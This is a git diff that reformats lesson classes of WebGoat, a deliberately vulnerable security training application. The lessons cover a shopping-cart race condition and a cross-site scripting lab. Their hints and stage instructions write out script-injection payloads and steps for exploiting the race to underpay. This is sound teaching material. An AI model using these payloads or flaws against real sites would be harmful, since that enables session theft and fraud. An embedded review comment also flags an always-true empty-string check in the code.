TD().addElement(c).setColSpan(2).setAlign("right")); + table.addElement(tr); + + ec.addElement(table); + ec.addElement(new BR()); + + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + + return (ec); } - catch (Exception e) + + /* + * ********************************************************************* ****************** + * CONFIRMATION PAGE ******************************** + * ********************************************************************* + */ + + private ElementContainer confirmation(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) { - s.setMessage("Error generating " + this.getClass().getName()); - e.printStackTrace(); + ElementContainer ec = new ElementContainer(); + + final String confNumber = "CONC-88"; + calcTOTAL = 0; + try + { + // Thread.sleep(5000); + + ec.addElement(new HR().setWidth("90%")); + ec.addElement(new Center().addElement(new H1().addElement("Thank you for your purchase!"))); + ec.addElement(new Center().addElement(new H1().addElement("Confirmation number: " + confNumber))); + Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%") + .setAlign("center"); + + if (s.isColor()) + { + table.setBorder(1); + } + + // Table Setup + TR tr = new TR(); + tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%")); + tr.addElement(new TH().addElement("Price").setWidth("10%")); + tr.addElement(new TH().addElement("Quantity").setWidth("3%")); + tr.addElement(new TH().addElement("Subtotal").setWidth("7%")); + table.addElement(tr); + + // Item 1 + tr = new TR(); // Create a new table object + tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive")); + tr.addElement(new TD().addElement("$169.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity1)).setAlign("center")); + + total = quantity1 * 169; + calcTOTAL += total; + tr.addElement(new TD().addElement("$" + 
formatInt(total) + ".00")); + table.addElement(tr); // Adds table to the HTML + + // Item 2 + tr = new TR(); + tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer")); + tr.addElement(new TD().addElement("$299.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity2)).setAlign("center")); + + total = quantity2 * 299; + calcTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + // Item 3 + tr = new TR(); + tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino")); + tr.addElement(new TD().addElement("$1799.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity3)).setAlign("center")); + + total = quantity3 * 1799; + calcTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + // Item 4 + tr = new TR(); + tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector ")); + tr.addElement(new TD().addElement("$649.00").setAlign("right")); + tr.addElement(new TD().addElement(String.valueOf(quantity4)).setAlign("center")); + + total = quantity4 * 649; + calcTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + ec.addElement(table); + + table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + table.setBorder(1); + } + + ec.addElement(new BR()); + + // Total Charged + tr = new TR(); + tr.addElement(new TD().addElement("Total Amount Charged to Your Credit Card:")); + tr.addElement(new TD().addElement("$" + formatFloat(runningTOTAL)).setAlign("right")); + table.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + table.addElement(tr); + + // Return to Store Button + Element b = ECSFactory.makeButton("Return to Store"); + tr = new TR(); + tr.addElement(new 
TD().addElement(b).setColSpan(2).setAlign("center")); + table.addElement(tr); + + ec.addElement(table); + ec.addElement(new BR()); + + } catch (Exception e) + { + s.setMessage("Error generating " + this.getClass().getName()); + e.printStackTrace(); + } + return (ec); } - return (ec); - } - String formatInt (int i) - { - NumberFormat intFormat = - NumberFormat.getIntegerInstance(Locale.US); - return intFormat.format(i); - } - - String formatFloat (float f) - { - NumberFormat floatFormat = - NumberFormat.getNumberInstance(Locale.US); - floatFormat.setMinimumFractionDigits(2); - floatFormat.setMaximumFractionDigits(2); - return floatFormat.format(f); - } - - int thinkPositive(int i) - { - if (i < 0 ) - return 0 ; - else - return i ; - } - - /** - * DOCUMENT ME! - * - * @return DOCUMENT ME! - */ - protected Category getDefaultCategory() { return Category.CONCURRENCY; } - - /** - * Gets the hints attribute of the AccessControlScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); - hints.add("Can you purchase the merchandise in your shopping cart for a lower price?"); - hints.add("Try using a new browser window to get a lower price."); - hints.add("In window A, purchase a low cost item, in window B a high cost item."); - hints.add("In window A, commit after updating cart in window B."); + /* + * ********************************************************************* ****************** + * SHOPPING PAGE ********************************** + * ********************************************************************* + */ - return hints; - } - - /** - * Gets the instructions attribute of the WeakAccessControl object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = "For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price."; - return (instructions); - } + private 
ElementContainer createShoppingPage(WebSession s, int quantity1, int quantity2, int quantity3, int quantity4) + { - private final static Integer DEFAULT_RANKING = new Integer(120); + ElementContainer ec = new ElementContainer(); + subTOTAL = 0; - protected Integer getDefaultRanking() { return DEFAULT_RANKING; } + try + { + ec.addElement(new HR().setWidth("90%")); + ec.addElement(new Center().addElement(new H1().addElement("Shopping Cart "))); + Table table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(1).setWidth("90%") + .setAlign("center"); - /** - * Gets the title attribute of the AccessControlScreen object - * - * @return The title value - */ - public String getTitle() { return "Shopping Cart Concurrency Flaw"; } - - public Element getCredits() { return super.getCustomCredits("", ASPECT_LOGO); } + if (s.isColor()) + { + table.setBorder(1); + } + + // Table Setup + TR tr = new TR(); + tr.addElement(new TH().addElement("Shopping Cart Items").setWidth("80%")); + tr.addElement(new TH().addElement("Price").setWidth("10%")); + tr.addElement(new TH().addElement("Quantity").setWidth("3%")); + tr.addElement(new TH().addElement("Subtotal").setWidth("7%")); + table.addElement(tr); + + // Item 1 + tr = new TR(); // Create a new table object + tr.addElement(new TD().addElement("Hitachi - 750GB External Hard Drive")); + tr.addElement(new TD().addElement("$169.00").setAlign("right")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY1", String.valueOf(quantity1))) + .setAlign("right")); + + total = quantity1 * 169; + subTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); // Adds table to the HTML + + // Item 2 + tr = new TR(); + tr.addElement(new TD().addElement("Hewlett-Packard - All-in-One Laser Printer")); + tr.addElement(new TD().addElement("$299.00").setAlign("right")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY2", String.valueOf(quantity2))) + .setAlign("right")); + 
+ total = quantity2 * 299; + subTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + // Item 3 + tr = new TR(); + tr.addElement(new TD().addElement("Sony - Vaio with Intel Centrino")); + tr.addElement(new TD().addElement("$1799.00").setAlign("right")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY3", String.valueOf(quantity3))) + .setAlign("right")); + + total = quantity3 * 1799; + subTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + // Item 4 + tr = new TR(); + tr.addElement(new TD().addElement("Toshiba - XGA LCD Projector ")); + tr.addElement(new TD().addElement("$649.00").setAlign("right")); + tr.addElement(new TD().addElement(new Input(Input.TEXT, "QTY4", String.valueOf(quantity4))) + .setAlign("right")); + + total = quantity4 * 649; + subTOTAL += total; + tr.addElement(new TD().addElement("$" + formatInt(total) + ".00")); + table.addElement(tr); + + ec.addElement(table); + + table = new Table().setCellSpacing(0).setCellPadding(2).setBorder(0).setWidth("90%").setAlign("center"); + + if (s.isColor()) + { + table.setBorder(1); + } + + ec.addElement(new BR()); + + // Purchasing Amount + tr = new TR(); + tr.addElement(new TD().addElement("Total: " + "$" + formatInt(subTOTAL) + ".00").setAlign("left")); + table.addElement(tr); + + // Update Button + Element b = ECSFactory.makeButton("Update Cart"); + tr = new TR(); + tr.addElement(new TD().addElement(b).setColSpan(2).setAlign("right")); + table.addElement(tr); + + tr = new TR(); + tr.addElement(new TD().addElement(" ").setColSpan(2)); + table.addElement(tr); + + // Purchase Button + Element c = ECSFactory.makeButton("Purchase"); + tr = new TR(); + tr.addElement(new TD().addElement(c).setColSpan(2).setAlign("right")); + table.addElement(tr); + + ec.addElement(table); + ec.addElement(new BR()); + + } catch (Exception e) + { + s.setMessage("Error generating " + 
this.getClass().getName()); + e.printStackTrace(); + } + return (ec); + } + + String formatInt(int i) + { + NumberFormat intFormat = NumberFormat.getIntegerInstance(Locale.US); + return intFormat.format(i); + } + + String formatFloat(float f) + { + NumberFormat floatFormat = NumberFormat.getNumberInstance(Locale.US); + floatFormat.setMinimumFractionDigits(2); + floatFormat.setMaximumFractionDigits(2); + return floatFormat.format(f); + } + + int thinkPositive(int i) + { + if (i < 0) + return 0; + else + return i; + } + + /** + * DOCUMENT ME! + * + * @return DOCUMENT ME! + */ + protected Category getDefaultCategory() + { + return Category.CONCURRENCY; + } + + /** + * Gets the hints attribute of the AccessControlScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) + { + List hints = new ArrayList(); + hints.add("Can you purchase the merchandise in your shopping cart for a lower price?"); + hints.add("Try using a new browser window to get a lower price."); + hints.add("In window A, purchase a low cost item, in window B a high cost item."); + hints.add("In window A, commit after updating cart in window B."); + + return hints; + } + + /** + * Gets the instructions attribute of the WeakAccessControl object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) + { + String instructions = "For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price."; + return (instructions); + } + + private final static Integer DEFAULT_RANKING = new Integer(120); + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the AccessControlScreen object + * + * @return The title value + */ + public String getTitle() + { + return "Shopping Cart Concurrency Flaw"; + } + + public Element getCredits() + { + return super.getCustomCredits("", ASPECT_LOGO); + } } \ No newline at end of file 
diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
index c848a8b91..60dac506d 100644
--- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
+++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/CrossSiteScripting.java
@@ -1,8 +1,8 @@ + package org.owasp.webgoat.lessons.CrossSiteScripting; import java.util.ArrayList; import java.util.List; - import org.apache.ecs.ElementContainer; import org.owasp.webgoat.lessons.Category; import org.owasp.webgoat.lessons.GoatHillsFinancial.DeleteProfile; 
@@ -19,287 +19,266 @@ import org.owasp.webgoat.session.ValidationException; import org.owasp.webgoat.session.WebSession; import org.owasp.webgoat.util.HtmlEncoder; + /** - /******************************************************************************* + * /******************************************************************************* * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ - * + * */ public class CrossSiteScripting extends GoatHillsFinancial { - private final static Integer DEFAULT_RANKING = new Integer(100); + private final static Integer DEFAULT_RANKING = new Integer(100); - public final static String STAGE1 = "Stored XSS"; - - public final static String STAGE2 = "Block Stored XSS using Input Validation"; - - public final static String STAGE3 = "Stored XSS Revisited"; - - public final static String STAGE4 = "Block Stored XSS using Output Encoding"; - - public final static String STAGE5 = "Reflected XSS"; - - public final static String STAGE6 = "Block Reflected XSS"; - - protected void registerActions(String className) - { - registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); - registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); - registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); - registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); - registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + public final static String STAGE1 = "Stored XSS"; - // These actions are special in that they chain to other actions. 
- registerAction(new Login(this, className, LOGIN_ACTION, - getAction(LISTSTAFF_ACTION))); - registerAction(new Logout(this, className, LOGOUT_ACTION, - getAction(LOGIN_ACTION))); - registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, - getAction(VIEWPROFILE_ACTION))); - registerAction(new UpdateProfile(this, className, - UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); - registerAction(new DeleteProfile(this, className, - DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); - } + public final static String STAGE2 = "Block Stored XSS using Input Validation"; - /** - * Gets the category attribute of the CrossSiteScripting object - * - * @return The category value - */ - public Category getDefaultCategory() - { - return Category.XSS; - } + public final static String STAGE3 = "Stored XSS Revisited"; - /** - * Gets the hints attribute of the DirectoryScreen object - * - * @return The hints value - */ - protected List getHints(WebSession s) - { - List hints = new ArrayList(); + public final static String STAGE4 = "Block Stored XSS using Output Encoding"; - // Stage 1 - hints.add("You can put HTML tags in form input fields."); - hints - .add("Bury a SCRIPT tag in the field to attack anyone who reads it."); - hints - .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in message fields."); - hints - .add("Enter this: <script>alert(\"document.cookie\");</script> in message fields."); + public final static String STAGE5 = "Reflected XSS"; - // Stage 2 - hints - .add("Many scripts rely on the use of special characters such as: <"); - hints - .add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering)."); - hints - .add("The java.util.regex package is useful for filtering string values."); + public final static String STAGE6 = "Block Reflected XSS"; - // Stage 3 - hints - .add("Browsers recognize and decode HTML entity encoded 
content after parsing and interpretting HTML tags."); - hints - .add("An HTML entity encoder is provided in the ParameterParser class."); - - // Stage 4 - hints - .add("Examine content served in response to form submissions looking for data taken from the form."); - - // Stage 5 - hints - .add("Validate early. Consider: out.println(\"Order for \" + request.getParameter(\"product\") + \" being processed...\");"); - - return hints; - } - - - /** - * Gets the instructions attribute of the ParameterInjection object - * - * @return The instructions value - */ - public String getInstructions(WebSession s) - { - String instructions = ""; - - if (!getLessonTracker(s).getCompleted()) + protected void registerActions(String className) { - String stage = getStage(s); - if (STAGE1.equals(stage)) - { - instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.
" - + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. " - + "Verify that 'Jerry' is affected by the attack."; - } - else if (STAGE2.equals(stage)) - { - instructions = "Stage 2: Block Stored XSS using Input Validation.
" - + "Implement a fix to block the stored XSS before it can be written to the database. " - + "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack."; - } - else if (STAGE3.equals(stage)) - { - instructions = "Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.
" - + "The 'Bruce' employee profile is pre-loaded with a stored XSS attack. " - + "Verify that 'David' is affected by the attack even though the fix from stage 2 is in place."; - } - else if (STAGE4.equals(stage)) - { - instructions = "Stage 4: Block Stored XSS using Output Encoding.
" - + "Implement a fix to block XSS after it is read from the database. " - + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack."; - } - else if (STAGE5.equals(stage)) - { - instructions = "Stage 5: Execute a Reflected XSS attack.
" - + "Use a vulnerability on the Search Staff page to craft a URL containing a reflected XSS attack. " - + "Verify that another employee using the link is affected by the attack."; - } - else if (STAGE6.equals(stage)) - { - instructions = "Stage 6: Block Reflected XSS using Input Validation.
" - + "Implement a fix to block this reflected XSS attack. " - + "Repeat step 5. Verify that the attack URL is no longer effective."; - } + registerAction(new ListStaff(this, className, LISTSTAFF_ACTION)); + registerAction(new SearchStaff(this, className, SEARCHSTAFF_ACTION)); + registerAction(new ViewProfile(this, className, VIEWPROFILE_ACTION)); + registerAction(new EditProfile(this, className, EDITPROFILE_ACTION)); + registerAction(new EditProfile(this, className, CREATEPROFILE_ACTION)); + + // These actions are special in that they chain to other actions. + registerAction(new Login(this, className, LOGIN_ACTION, getAction(LISTSTAFF_ACTION))); + registerAction(new Logout(this, className, LOGOUT_ACTION, getAction(LOGIN_ACTION))); + registerAction(new FindProfile(this, className, FINDPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new UpdateProfile(this, className, UPDATEPROFILE_ACTION, getAction(VIEWPROFILE_ACTION))); + registerAction(new DeleteProfile(this, className, DELETEPROFILE_ACTION, getAction(LISTSTAFF_ACTION))); } - return instructions; - - } - - @Override - public String[] getStages() { - if (getWebgoatContext().isCodingExercises()) - return new String[] {STAGE1, STAGE2, STAGE3, STAGE4, STAGE5, STAGE6}; - return new String[] {STAGE1, STAGE3, STAGE5}; - } - - public void handleRequest(WebSession s) - { - if (s.getLessonSession(this) == null) - s.openLessonSession(this); - - String requestedActionName = null; - try + /** + * Gets the category attribute of the CrossSiteScripting object + * + * @return The category value + */ + public Category getDefaultCategory() { - requestedActionName = s.getParser().getStringParameter("action"); + return Category.XSS; } - catch (ParameterNotFoundException pnfe) + + /** + * Gets the hints attribute of the DirectoryScreen object + * + * @return The hints value + */ + protected List getHints(WebSession s) { - // Let them eat login page. 
- requestedActionName = LOGIN_ACTION; + List hints = new ArrayList(); + + // Stage 1 + hints.add("You can put HTML tags in form input fields."); + hints.add("Bury a SCRIPT tag in the field to attack anyone who reads it."); + hints + .add("Enter this: <script language=\"javascript\" type=\"text/javascript\">alert(\"Ha Ha Ha\");</script> in message fields."); + hints.add("Enter this: <script>alert(\"document.cookie\");</script> in message fields."); + + // Stage 2 + hints.add("Many scripts rely on the use of special characters such as: <"); + hints + .add("Allowing only a certain set of characters (positive filtering) is preferred to blocking a set of characters (negative filtering)."); + hints.add("The java.util.regex package is useful for filtering string values."); + + // Stage 3 + hints + .add("Browsers recognize and decode HTML entity encoded content after parsing and interpretting HTML tags."); + hints.add("An HTML entity encoder is provided in the ParameterParser class."); + + // Stage 4 + hints.add("Examine content served in response to form submissions looking for data taken from the form."); + + // Stage 5 + hints + .add("Validate early. Consider: out.println(\"Order for \" + request.getParameter(\"product\") + \" being processed...\");"); + + return hints; } - if (requestedActionName != null) + /** + * Gets the instructions attribute of the ParameterInjection object + * + * @return The instructions value + */ + public String getInstructions(WebSession s) { - try - { - LessonAction action = getAction(requestedActionName); + String instructions = ""; - if (action != null) + if (!getLessonTracker(s).getCompleted()) { - if (!action.requiresAuthentication() - || action.isAuthenticated(s)) - { - action.handleRequest(s); - //setCurrentAction(s, action.getNextPage(s)); - } + String stage = getStage(s); + if (STAGE1.equals(stage)) + { + instructions = "Stage 1: Execute a Stored Cross Site Scripting (XSS) attack.
" + + "As 'Tom', execute a Stored XSS attack against the Street field on the Edit Profile page. " + + "Verify that 'Jerry' is affected by the attack."; + } + else if (STAGE2.equals(stage)) + { + instructions = "Stage 2: Block Stored XSS using Input Validation.
" + + "Implement a fix to block the stored XSS before it can be written to the database. " + + "Repeat stage 1 as 'Eric' with 'David' as the manager. Verify that 'David' is not affected by the attack."; + } + else if (STAGE3.equals(stage)) + { + instructions = "Stage 3: Execute a previously Stored Cross Site Scripting (XSS) attack.
" + + "The 'Bruce' employee profile is pre-loaded with a stored XSS attack. " + + "Verify that 'David' is affected by the attack even though the fix from stage 2 is in place."; + } + else if (STAGE4.equals(stage)) + { + instructions = "Stage 4: Block Stored XSS using Output Encoding.
" + + "Implement a fix to block XSS after it is read from the database. " + + "Repeat stage 3. Verify that 'David' is not affected by Bruce's profile attack."; + } + else if (STAGE5.equals(stage)) + { + instructions = "Stage 5: Execute a Reflected XSS attack.
" + + "Use a vulnerability on the Search Staff page to craft a URL containing a reflected XSS attack. " + + "Verify that another employee using the link is affected by the attack."; + } + else if (STAGE6.equals(stage)) + { + instructions = "Stage 6: Block Reflected XSS using Input Validation.
" + + "Implement a fix to block this reflected XSS attack. " + + "Repeat step 5. Verify that the attack URL is no longer effective."; + } } - else - { - setCurrentAction(s, ERROR_ACTION); - } - } - catch (ParameterNotFoundException pnfe) - { - System.out.println("Missing parameter"); - pnfe.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (ValidationException ve) - { - System.out.println("Validation failed"); - ve.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } - catch (UnauthenticatedException ue) - { - s.setMessage("Login failed"); - System.out.println("Authentication failure"); - ue.printStackTrace(); - } - catch (UnauthorizedException ue2) - { - s.setMessage("You are not authorized to perform this function"); - System.out.println("Authorization failure"); - ue2.printStackTrace(); - } - catch (Exception e) - { - // All other errors send the user to the generic error page - System.out.println("handleRequest() error"); - e.printStackTrace(); - setCurrentAction(s, ERROR_ACTION); - } + + return instructions; + } - // All this does for this lesson is ensure that a non-null content exists. - setContent(new ElementContainer()); - } + @Override + public String[] getStages() + { + if (getWebgoatContext().isCodingExercises()) + return new String[] { STAGE1, STAGE2, STAGE3, STAGE4, STAGE5, STAGE6 }; + return new String[] { STAGE1, STAGE3, STAGE5 }; + } - protected Integer getDefaultRanking() - { - return DEFAULT_RANKING; - } + public void handleRequest(WebSession s) + { + if (s.getLessonSession(this) == null) s.openLessonSession(this); + String requestedActionName = null; + try + { + requestedActionName = s.getParser().getStringParameter("action"); + } catch (ParameterNotFoundException pnfe) + { + // Let them eat login page. 
+ requestedActionName = LOGIN_ACTION; + } - /** - * Gets the title attribute of the CrossSiteScripting object - * - * @return The title value - */ - public String getTitle() - { - return "LAB: Cross Site Scripting"; - } + if (requestedActionName != null) + { + try + { + LessonAction action = getAction(requestedActionName); + + if (action != null) + { + if (!action.requiresAuthentication() || action.isAuthenticated(s)) + { + action.handleRequest(s); + // setCurrentAction(s, action.getNextPage(s)); + } + } + else + { + setCurrentAction(s, ERROR_ACTION); + } + } catch (ParameterNotFoundException pnfe) + { + System.out.println("Missing parameter"); + pnfe.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (ValidationException ve) + { + System.out.println("Validation failed"); + ve.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } catch (UnauthenticatedException ue) + { + s.setMessage("Login failed"); + System.out.println("Authentication failure"); + ue.printStackTrace(); + } catch (UnauthorizedException ue2) + { + s.setMessage("You are not authorized to perform this function"); + System.out.println("Authorization failure"); + ue2.printStackTrace(); + } catch (Exception e) + { + // All other errors send the user to the generic error page + System.out.println("handleRequest() error"); + e.printStackTrace(); + setCurrentAction(s, ERROR_ACTION); + } + } + + // All this does for this lesson is ensure that a non-null content exists. 
+ setContent(new ElementContainer()); + } + + protected Integer getDefaultRanking() + { + return DEFAULT_RANKING; + } + + /** + * Gets the title attribute of the CrossSiteScripting object + * + * @return The title value + */ + public String getTitle() + { + return "LAB: Cross Site Scripting"; + } public String htmlEncode(WebSession s, String text) { - if (STAGE4.equals(getStage(s)) && - text.indexOf("") > -1) + if (STAGE4.equals(getStage(s)) && text.indexOf("") > -1) { setStageComplete(s, STAGE4); - s.setMessage( "Welcome to stage 5 -- exploiting the data layer" ); + s.setMessage("Welcome to stage 5 -- exploiting the data layer"); } - + return HtmlEncoder.encode(text); } diff --git a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java index 605fa82dc..4224c606e 100644 --- a/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java +++ b/main/project/JavaSource/org/owasp/webgoat/lessons/CrossSiteScripting/EditProfile.java @@ -1,9 +1,9 @@ + package org.owasp.webgoat.lessons.CrossSiteScripting; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; - import org.owasp.webgoat.lessons.GoatHillsFinancial.DefaultLessonAction; import org.owasp.webgoat.lessons.GoatHillsFinancial.GoatHillsFinancial; import org.owasp.webgoat.session.Employee; 
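Review bot: In `htmlEncode` at the end of the hunk, the new-side condition `text.indexOf("") > -1` is true for every non-null string (indexOf of the empty string returns 0), so STAGE4 is marked complete on any encode call while that stage is active, and a null `text` throws before the encoder runs. The empty literal may be an artefact of a lost tag on this page; if a marker substring was intended, restore it and guard null, e.g. `if (STAGE4.equals(getStage(s)) && text != null && text.indexOf(EXPECTED_MARKER) > -1)` with EXPECTED_MARKER standing in for the project's actual marker. Separately, `handleRequest` now collapses `if (s.getLessonSession(this) == null) s.openLessonSession(this);` onto one braceless line, which the rest of the file does not do; I would keep the braces. The license banner is also now opened as `/** * /*****...`, which turns it into the class Javadoc rather than a plain block comment.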
@@ -12,184 +12,150 @@ import org.owasp.webgoat.session.UnauthenticatedException; import org.owasp.webgoat.session.UnauthorizedException; import org.owasp.webgoat.session.WebSession; -/******************************************************************************* + +/*************************************************************************************************** * * - * This file is part of WebGoat, an Open Web Application Security Project - * utility. For details, please see http://www.owasp.org/ + * This file is part of WebGoat, an Open Web Application Security Project utility. For details, + * please see http://www.owasp.org/ * * Copyright (c) 2002 - 2007 Bruce Mayhew * - * This program is free software; you can redistribute it and/or modify it under - * the terms of the GNU General Public License as published by the Free Software - * Foundation; either version 2 of the License, or (at your option) any later - * version. + * This program is free software; you can redistribute it and/or modify it under the terms of the + * GNU General Public License as published by the Free Software Foundation; either version 2 of the + * License, or (at your option) any later version. * - * This program is distributed in the hope that it will be useful, but WITHOUT - * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS - * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more - * details. + * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without + * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * General Public License for more details. * - * You should have received a copy of the GNU General Public License along with - * this program; if not, write to the Free Software Foundation, Inc., 59 Temple - * Place - Suite 330, Boston, MA 02111-1307, USA. 
+ * You should have received a copy of the GNU General Public License along with this program; if + * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA + * 02111-1307, USA. * * Getting Source ============== * - * Source for this application is maintained at code.google.com, a repository - * for free software projects. + * Source for this application is maintained at code.google.com, a repository for free software + * projects. * * For details, please see http://code.google.com/p/webgoat/ */ public class EditProfile extends DefaultLessonAction { - public EditProfile(GoatHillsFinancial lesson, String lessonName, - String actionName) - { - super(lesson, lessonName, actionName); - } - - - public void handleRequest(WebSession s) throws ParameterNotFoundException, - UnauthenticatedException, UnauthorizedException - { - getLesson().setCurrentAction(s, getActionName()); - - if (isAuthenticated(s)) + public EditProfile(GoatHillsFinancial lesson, String lessonName, String actionName) { - int userId = getUserId(s); - int employeeId = s.getParser().getIntParameter( - CrossSiteScripting.EMPLOYEE_ID); - - Employee employee = getEmployeeProfile(s, userId, employeeId); - setSessionAttribute(s, getLessonName() + "." 
- + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY, employee); + super(lesson, lessonName, actionName); } - else - throw new UnauthenticatedException(); - } - - public String getNextPage(WebSession s) - { - return CrossSiteScripting.EDITPROFILE_ACTION; - } - - - public Employee getEmployeeProfile(WebSession s, int userId, - int subjectUserId) throws UnauthorizedException - { - Employee profile = null; - - // Query the database for the profile data of the given employee - try + public void handleRequest(WebSession s) throws ParameterNotFoundException, UnauthenticatedException, + UnauthorizedException { - String query = "SELECT * FROM employee WHERE userid = ?"; + getLesson().setCurrentAction(s, getActionName()); - try - { - PreparedStatement answer_statement = WebSession - .getConnection(s).prepareStatement(query, - ResultSet.TYPE_SCROLL_INSENSITIVE, - ResultSet.CONCUR_READ_ONLY); - answer_statement.setInt(1, subjectUserId); - ResultSet answer_results = answer_statement.executeQuery(); - if (answer_results.next()) + if (isAuthenticated(s)) { - // Note: Do NOT get the password field. 
- profile = new Employee(answer_results.getInt("userid"), - answer_results.getString("first_name"), - answer_results.getString("last_name"), - answer_results.getString("ssn"), answer_results - .getString("title"), answer_results - .getString("phone"), answer_results - .getString("address1"), answer_results - .getString("address2"), answer_results - .getInt("manager"), answer_results - .getString("start_date"), answer_results - .getInt("salary"), answer_results - .getString("ccn"), answer_results - .getInt("ccn_limit"), answer_results - .getString("disciplined_date"), - answer_results.getString("disciplined_notes"), - answer_results.getString("personal_description")); - /* System.out.println("Retrieved employee from db: " + - profile.getFirstName() + " " + profile.getLastName() + - " (" + profile.getId() + ")"); - */} - } - catch (SQLException sqle) - { - s.setMessage("Error getting employee profile"); - sqle.printStackTrace(); - } - } - catch (Exception e) - { - s.setMessage("Error getting employee profile"); - e.printStackTrace(); + int userId = getUserId(s); + int employeeId = s.getParser().getIntParameter(CrossSiteScripting.EMPLOYEE_ID); + + Employee employee = getEmployeeProfile(s, userId, employeeId); + setSessionAttribute(s, getLessonName() + "." 
